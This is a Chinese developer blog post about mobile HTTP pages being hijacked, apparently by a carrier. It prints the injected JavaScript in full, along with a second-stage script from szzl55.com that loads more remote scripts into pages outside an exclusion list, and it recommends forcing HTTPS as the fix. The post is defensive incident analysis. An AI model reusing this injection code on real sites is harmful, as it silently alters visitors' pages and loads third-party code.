网站在移动端访问时偶尔不能加载页面,http访问被劫持

最新推荐文章于 2021-01-17 10:55:37 发布
原创 最新推荐文章于 2021-01-17 10:55:37 发布 · 4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种网站移动端访问时出现页面空白的情况,并分析了注入的恶意JS代码,该代码用于显示特定广告内容。文章提供了通过HTTPS访问来避免此类问题的解决方案。

今天发生一件很离奇的事,网站在移动端访问时,经常偶发性的、无规律的出现页面空白的情况。经过排查,发现在不能正常展示页面的时候,页面代码里面被人注入了一段js。如下:

<script>!function(){function a(){var a=new Date;a.setTime(a.getTime()+6e4),document.cookie="sessioned=1;expires="+a.toUTCString()}function b(b){a(),setTimeout(function(){location.href=location.href},b)}var d,e,f,c=1e4;try{if(!/sessioned=1/.test(document.cookie)){a(),e=document.createElement("script"),f=!1,e.src="http://www.szzl55.com/gt/popup/db-zkl-hx5.js?4",e.type="text/javascript",e.charset="UTF-8",d=new XMLHttpRequest,d.open("GET",window.location,!0),d.setRequestHeader("X-Requested-With","XMLHttpRequest");try{d.timeout=c}catch(g){}d.send(),d.onreadystatechange=function(){try{if(4==d.readyState){if(200!=d.status||"text/html"!=d.getResponseHeader("Content-Type"))throw"";text=d.responseText.replace(/<\/body>/i,e.outerHTML+"</body>"),document.open("text/html","replace"),document.write(text),setTimeout(function(){document.close()},1e3),f=!0}}catch(a){b(100)}}}}catch(g){b(150)}finally{setTimeout(function(){f||b(1)},c+1e3)}}();</script>

分析一下这段JS代码,发现它下载“http://www.szzl55.com//gt/popup/db-zkl-hx5.js?4”文件。文件内容:

!function() {
    var re = /\.edu|\.gov|\.org|\.189\.cn|\.ct10000\.com|\.118114\.cn|\.10086|\.10010|\.icbc\.com\.cn|\.ccb\.com|\.abchina\.com|\.boc\.cn|\.bankcomm\.com|\.cmbchina\.com|\.pingan\.com|\.cib\.com\.cn|\.cgbchina\.com\.cn|\.psbc\.com|\.spdb\.com|\.microsoft\.com|\.apple\.com|\.bing\.com|\.qzone|\.gtimg\.cn|\.alipay\.com|\.alibaba\.com|\.aliyun\.com|\.aliexpress\.com|\.1688\.com|\.alimama\.com|\.alitrip\.com|120\.24\.157\.107|\.zzgjj\.com|\.people\.com|\.people\.cn|\.12306\.cn|\.153\.cn|\.xinhuanet\.com|\.china\.com|pop\.10jqka\.com\.cn|\.linezing\.com|\.youmi\.net|\.qihuo\.com|\.wps\.cn|\.rising\.com\.cn/;
    var _ad_div = '_zkl_t';
    var _isMobile = false;
    try {
        if (window.innerWidth <= 600 && window.innerHeight <= 800) {
            _isMobile = true;
        }
    } catch (e) {
    }
                _isMobile = true;

    if (!re.test(location.href) && !document.getElementById(_ad_div)) {
        var _style = '';
        if (_isMobile) {
            _style = 'z-index: 2147483646;' +
            'text-align: center;' +
            'margin: 0 auto;' +
						'display: none;' +
            'width: ' + window.innerWidth + 'px;';
        } else {
            _style = 'display: inline-block;' +
            'width: 300px;' +
            'height: 250px;' +
            'position: fixed;' +
            'bottom: 0px;' +
            'right: 18px;' +
						'display: none;' +
            'z-index: 2147483646;';
        }

        var _div = '%3Cdiv%20id%3D%22' + _ad_div + '%22' + ' style%3D%22' + escape(_style) + '%22%3E';
      	if (_isMobile) {
		document.write(unescape(_div));
		document.write(unescape("%3Cscript%20type%3D%22text%2Fjavascript%22%20charset%3D%22utf-8%22%20src%3D%22http%3A%2F%2Fou7rhs2a4.bkt.clouddn.com%2Fgta.js%3F11%22%3E%3C%2Fscript%3E"));
		document.write(unescape("%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22http%3A//www.szzl55.com/gt/popup/dlink5.js%3F39%22%3E%3C%2Fscript%3E"));
		//document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fwww.155rc.com%2Fgt%2Ftest%3Fdlink-tj.html%22%20style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E"));
		//document.write(unescape("%3C%2Fdiv%3E"));
      	}
        //if (_isMobile){
        //    setMobilePosition();
        //}
    }
}();

先判断访问的目标地址是否是教育网站、政府网站、机构网站、几大运营商网站、银行网站、各大公司网站(估计他们惹不起)等,如果不是,就下手了,擦!!!

并且里面还有一个网站,让我猜测这TM就是郑州的运营商干的事:zzgjj.com(郑州公积金官网)

解决办法其实很简单:

不使用http访问,使用https访问,如果是http访问,跳转到https,这样就没有中间商赚差价了。


运营商,真不要脸。



===================

我们这边修改成https访问,就再也没有出现页面被劫持后注入代码的问题。



old_lover
关注
常见网站劫持案例及解析
03-29 850
攻击者在入侵网站后,常常会通过恶意劫持流量来获取收益,从而实现流量变现。有一些黑帽劫持的手法堪称防不胜防,正常的访问行为很难发现异常。今天给大家分享一下常见的网站劫持手法和排查思路。我们可...
移动端真机调试指南
qq_36262295的博客
07-08 941
移动端调试指南
为什么网站用手机移动4G网络打不开?
生活在继续
04-04 3万+
首先判断用电信和联通网络是否可正常访问。 如果仅移动不能访问,这是移动网络的缘故,某些网站不能访问移动DNS服务器不能快速准确地解析域名所导致。 有条件的可以购买云DNS解析 ...
移动端网页 不可用_网页不可用的操作
culin0274的博客
08-09 663
移动端网页 不可用 DNS is the web service that translates a website’s name to its Internet address. This error is most often caused by having no connection to the Internet or a misconfigured network. It can a...
腾讯x5Webview取代原生android Webview
weixin_30642561的博客
09-26 704
一、官方地址:https://x5.tencent.com/tbs/ 二、不需要申请开发者,QQ直接登录,下载即可集成到项目中。 三、与原生的webview对比优势 1) 速度快:相比系统webview的网页打开速度有30+%的提升; 2) 省流量:使用云端优化技术使流量节省20+%; 3) 更安全:安全问题可以在24小内修复; 4) 更稳定:经过亿级用户的使用考验,CRASH率低...
H5移动端开发遇到问题,和方案
林中明月间丶
06-30 278
1. 弹出数字键盘 <!-- 有"#" "*"符号输入 --> <input type="tel"> ​ <!-- 纯数字 --> <input pattern="\d*"> 安卓跟IOS的表现形式应该不一样,大家可以自己试试。当运用了正则pattern后,就不用关注input的类型了 打开原生应用 <a href="weixin://">打开微信</a> <a href="alipays:/.
[240]python的urllib.parse库解析URL
周小董
07-04 1万+
除了 urlparse() 之外,还有一个类似的 urlsplit() 函数也能对 URL 进行拆分,所不同的是, urlsplit() 并不会把 路径参数(params) 从 路径(path) 中分离出来。如果只是希望对特殊字符进行转义,那么可以使用 quote 或 quote_plus 函数,其中 quote_plus 比 quote 更激进一些,会把 : 、 / 一类的符号也给转义了。除此之外, urllib.parse 还提供了一个 urljoin() 函数,来将相对路径转换成绝对路径的 URL。
Socket套接字、HTTP协议简单介绍、URI、网站访问量、http请求处理过程、HTTPD介绍、MPM工作模式
zerocdn的博客
03-11 814
Socket套接字 Socket:套接字,进程间通信IPC的一种实现,允许位于不同主机(或同一主机)上不同进程之间进行通信和数据交换,SocketAPI出现于1983年,4.2 BSD实现 Socket API:封装了内核中所提供的socket通信相关的系统调用 Socket Domain:根据其所使用的地址 AF_INET:Address Family,IPv4 AF_INET6:IPv6 AF...
【跨平台开发实战】:Vue与WangEditor在移动端的应用技巧
首先,概述了Vue.js的核心概念及其在组件化开发中的实践,然后详细讨论了Vue.js的生命周期和状态管理,特别是在移动端性能优化方面,包括代码分割与PWA技术。文章进一步介绍了移动端富文本编辑器WangEditor的特点、...
1.注册流程: 用户填写注册表单,实进行字段验证: 用户名检查格式(中英文、数字、下划线)和唯一性 手机号验证11位有效格式和是否已被注册 密码需6-12位字母数字组合 确认密码必须与密码一致 所有验证通过后,用户数据被保存到localStorage的users集合中 注册成功提示后自动跳转至登录页面 2.登录流程: 用户输入手机号和密码后,系统在localStorage的users数据中查找匹配项 验证成功后将用户信息存入sessionStorage作为会话凭证 登录状态通过sessionStorage的currentUser字段维持,用于各页面访问控制 3.商品展示流程: 首页根据设备屏幕尺寸显示不同的布局: 桌面端:多列网格布局,带背景动画和侧边导航 移动端:单列布局,可折叠的汉堡菜单 商品图片支持鼠标悬停切换效果,展示不同角度视图 "猜你喜欢"区域使用CSS动画实现自动水平滚动 4.购物车管理流程: 添加商品检查是否已存在,存在则增加数量,不存在则新增条目 购物车数据实保存到localStorage的cart字段 购物车页面可调整商品数量或删除商品,每次操作后重新计算总价 结算功能模拟订单提交,清空购物车并显示确认信息 5.用户数据: 使用localStorage的users键存储所有注册用户信息 数据结构包含用户名、加密密码和手机号等字段 新用户注册追加到现有用户数组 6.会话管理: 登录成功的用户信息存入sessionStorage的currentUser 各受保护页面加载检查此字段决定是否允许访问 浏览器关闭后会话自动失效 7.购物车数据: 使用localStorage的cart键存储购物车状态 包含商品ID、名称、价格、数量和图片等完整信息 跨页面访问保持购物车内容一致 根据这个画一个流程图
最新发布
07-18
我们被要求根据提供的Web应用功能描述绘制流程图。功能包括:用户注册登录、商品展示、购物车管理、会话管理、数据存储。 根据引用内容,我们可以提取关键信息: 1. 用户注册登录:引用[4]描述了登录流程,包括...
关于移动宽带连不上某些网站的解决办法
热门推荐
m0_46716264的博客
01-17 8万+
今天想在家上自己的博客,结果网站打不开,而在学校就可以。 上网搜索,发现是移动宽带不连接公共ip的原因,于是选择更改dns。 系统是win10。 看到这个网站 以下是我的步骤: 1.设置——控制面板——网络和Internet——网络和共享中心: 2.点击连上的WiFi,我点击WLAN(1201-主卧_5G),看到这个窗口 3.点击左下角属性,勾选Internet协议版本4(TCP/IPv4),然后点击属性 4.然后勾选使用下面的DNS服务器地址,在这里填写新DNS 我选择的是阿里DNS,因为比较快。
移动用户无法访问网站
weixin_33695450的博客
05-17 626
移动用户无法访问网站了   监控中心呼叫运维组:大量移动用户无法正常访问网站,特别是移动手机用户无法访问了。请速度处理!速度处理!!! 运维中心最怕这种电信机房的服务器要响应移动用户的访问。由于两网路由的不畅通。造成大量的移动用户无法访问电信服务器。这样一来,运维组人员的日子就不好过了。天天被监控中心要求处理这些问题。头痛呀,这些只有电信级的才能处理的问题...
移动设备的web站开发和将web封转成移动端应用的一些资料
weixin_34148508的博客
06-24 250
jQuery mobile http://jquerymobile.com http://www.jqmapi.com/ http://www.wglong.com/main/artical!demos#swipe http://www.photoswipe.com/ phonegap http://www.phonegapcn.com/developers/tools ...
移动端web前端的那些坑
忆凌波的专栏
05-04 6635
1.移动端文件名不要用game等,以防被合作服务器劫持插入广告,从而影响项目运行 2.红米手机,ua返回iphone,需要结合platform判断,但是还不准确,导致需要ios和android区别对待的候就坑了。 3.是fixed的问题。这个解决办法是尽量不要用,不过ios7及以下才会出现这个问题。某些情况下红米也会有这个问题。 4.如果你想要使用css3的动画,那
通过http文件服务器hfs,建立一个临HTTP文件服务,使能通过手机浏览器等访问下载计算机中指定的文件
张海玲的博客
06-01 3134
1.hfs介绍 http文件服务器hfs(http file server)是一种上传文件的软件。 专为个人用户所设计的 HTTP 档案系统 - Http File Server,如果您觉得架设 FTP Server 太麻烦,那么这个软件可以提供您更方便的档案传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值